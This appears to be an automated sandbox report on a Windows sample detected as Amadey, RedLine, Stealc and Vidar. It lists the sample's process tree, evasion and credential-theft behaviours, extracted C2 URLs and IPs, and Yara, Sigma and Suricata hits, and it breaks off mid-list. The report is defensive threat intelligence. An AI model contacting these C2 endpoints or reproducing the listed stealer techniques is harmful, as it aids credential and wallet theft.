Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1483138
MD5:	8e3c2682f9743107cb2b3a3d15b072f5
SHA1:	660a9b6ad3f5cd1bd37e04015b25a893de4c5f90
SHA256:	6322686d71a40e20eca9b41af872049e06aab4439a2d06e607e9620decfec41d
Tags:	exe
Infos:

Detection

Amadey, Babadeda, RedLine, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Yara detected Amadeys stealer DLL

Yara detected Babadeda

Yara detected Powershell download and execute

Yara detected RedLine Stealer

Yara detected Stealc

Yara detected Vidar

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Drops PE files with a suspicious file extension

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Installs new ROOT certificates

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious File Creation In Uncommon AppData Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops certificate files (DER)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: CurrentVersion Autorun Keys Modification

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 616 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 8E3C2682F9743107CB2B3A3D15B072F5)

cmd.exe (PID: 1716 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RoamingBKKFHIEGDH.exe (PID: 7080 cmdline: "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe" MD5: C6620FE2690605F20F5B9C970E8130C6)

axplong.exe (PID: 6204 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: C6620FE2690605F20F5B9C970E8130C6)

cmd.exe (PID: 6784 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RoamingAEGIJKEHCA.exe (PID: 2604 cmdline: "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe" MD5: 2985641A4880DB928DCF810EAA14041D)

explorti.exe (PID: 4980 cmdline: "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" MD5: 2985641A4880DB928DCF810EAA14041D)

WerFault.exe (PID: 4140 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 616 -s 2504 MD5: C31336C1EFC2CCB44B4326EA793040F2)

axplong.exe (PID: 2820 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: C6620FE2690605F20F5B9C970E8130C6)

explorti.exe (PID: 7056 cmdline: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe MD5: 2985641A4880DB928DCF810EAA14041D)

explorti.exe (PID: 3652 cmdline: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe MD5: 2985641A4880DB928DCF810EAA14041D)

ba77748b9b.exe (PID: 3144 cmdline: "C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe" MD5: 8E3C2682F9743107CB2B3A3D15B072F5)

WerFault.exe (PID: 5168 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 1040 MD5: C31336C1EFC2CCB44B4326EA793040F2)

ead6a72944.exe (PID: 6300 cmdline: "C:\Users\user\1000003002\ead6a72944.exe" MD5: 5C88DA04EC807C26F6DB500EEB8D983B)

cmd.exe (PID: 3596 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7366.tmp\7367.tmp\7368.bat C:\Users\user\1000003002\ead6a72944.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chrome.exe (PID: 3472 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7084 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2476 --field-trial-handle=2404,i,6116549712235558753,12862378424519255312,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msedge.exe (PID: 4396 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 1292 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2072,i,12084099025757561661,8900613295013787749,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

firefox.exe (PID: 5676 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

axplong.exe (PID: 3924 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: C6620FE2690605F20F5B9C970E8130C6)

PharmaciesDetection.exe (PID: 1472 cmdline: "C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe" MD5: 569720E2C07B1D34BAC1366BF2B1C97A)

cmd.exe (PID: 5084 cmdline: "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5860 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 1476 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

buildred.exe (PID: 6340 cmdline: "C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe" MD5: 4E0235942A9CDE99EE2EE0EE1A736E4F)

build2.exe (PID: 7964 cmdline: "C:\Users\user\AppData\Local\Temp\1000028001\build2.exe" MD5: 410E91A252FFE557A41E66A174CD6DCB)

firefox.exe (PID: 6176 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 7092 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 8456 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2240 -parentBuildID 20230927232528 -prefsHandle 2124 -prefMapHandle 2140 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5bf760f3-4a16-4712-bdf3-1a7919266e26} 7092 "\\.\pipe\gecko-crash-server-pipe.7092" 26181e6b310 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

msedge.exe (PID: 7456 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com/account MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7736 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2932 --field-trial-handle=2680,i,8259539397810858714,2629132827171544738,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 5880 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6684 --field-trial-handle=2680,i,8259539397810858714,2629132827171544738,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

ba77748b9b.exe (PID: 8448 cmdline: "C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe" MD5: 8E3C2682F9743107CB2B3A3D15B072F5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Babadeda	According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.	No Attribution	https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities	https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://85.28.47.31/5499d72b3a3e55be.php"}

Threatname: Vidar

{"C2 url": "http://85.28.47.31silence"}

Threatname: Amadey

{"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}

Threatname: RedLine

{"C2 url": ["185.215.113.9:9137"], "Bot Id": "Logs", "Authorization Header": "f3f88d8c3034a76ac8ad2a0de6407050"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\1000003002\ead6a72944.exe	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\buildred[1].exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.2345647298.00000000003E1000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2419937353.0000000002600000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000001A.00000000.2683951657.0000000000802000.00000002.00000001.01000000.00000012.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000F.00000002.2374868692.00000000009C1000.00000040.00000001.01000000.0000000F.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000010.00000003.2334485830.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2420117641.00000000026D7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000013.00000003.2619079052.00000000051C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2420085269.00000000026BD000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1590:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000005.00000002.2268957784.0000000000A51000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000008.00000003.2257667702.00000000052D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000002E.00000002.2853783541.00000000026E0000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1000:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000002E.00000002.2853920976.00000000026FA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000009.00000002.2308246588.0000000000EC1000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000F.00000003.2334562706.00000000051A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000009.00000003.2265462516.0000000005430000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000A.00000003.2270527993.0000000005570000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000005.00000003.2225343744.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000016.00000002.2778148129.00000000027BD000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x15c8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000A.00000002.2311063767.0000000000EC1000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000010.00000002.2374750517.00000000009C1000.00000040.00000001.01000000.0000000F.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000014.00000003.2615701145.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000016.00000002.2769315427.00000000026F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000002E.00000002.2853503959.00000000026A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: file.exe PID: 616	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 616	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 616	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 616	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: ba77748b9b.exe PID: 3144	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: ba77748b9b.exe PID: 3144	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: buildred.exe PID: 6340	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: buildred.exe PID: 6340	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: ba77748b9b.exe PID: 8448	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: ba77748b9b.exe PID: 8448	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 33 entries

Unpacked PEs

Source	Rule	Description	Author
28.2.ead6a72944.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
28.0.ead6a72944.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
26.0.buildred.exe.800000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.2.axplong.exe.ec0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
15.2.explorti.exe.9c0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
16.2.explorti.exe.9c0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
10.2.axplong.exe.ec0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
5.2.RoamingBKKFHIEGDH.exe.a50000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
8.2.RoamingAEGIJKEHCA.exe.3e0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 4 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe, ProcessId: 3652, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ba77748b9b.exe

Sigma detected: Suspicious File Creation In Uncommon AppData Folder

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 616, TargetFilename: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe, ProcessId: 3652, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ba77748b9b.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:27.065937+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:31.941429+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T17:56:14.446725+0200
SID:	2803304
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:31.366446+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:17.305996+0200
SID:	2028765
Source Port:	61515
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:26.679694+0200
SID:	2028765
Source Port:	55778
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:19.510485+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:01.258993+0200
SID:	2028765
Source Port:	61453
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-07-26T17:57:10.089509+0200
SID:	2044696
Source Port:	61186
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:15.246953+0200
SID:	2028765
Source Port:	61508
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:22.098290+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:00.571174+0200
SID:	2049087
Source Port:	61433
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE UTF-8/16 Encoded Shellcode - Source IP: 34.149.100.209 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:58:23.340026+0200
SID:	2012510
Source Port:	443
Destination Port:	55750
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:56:13.586679+0200
SID:	2011803
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Executable code was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:38.161525+0200
SID:	2028765
Source Port:	55838
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

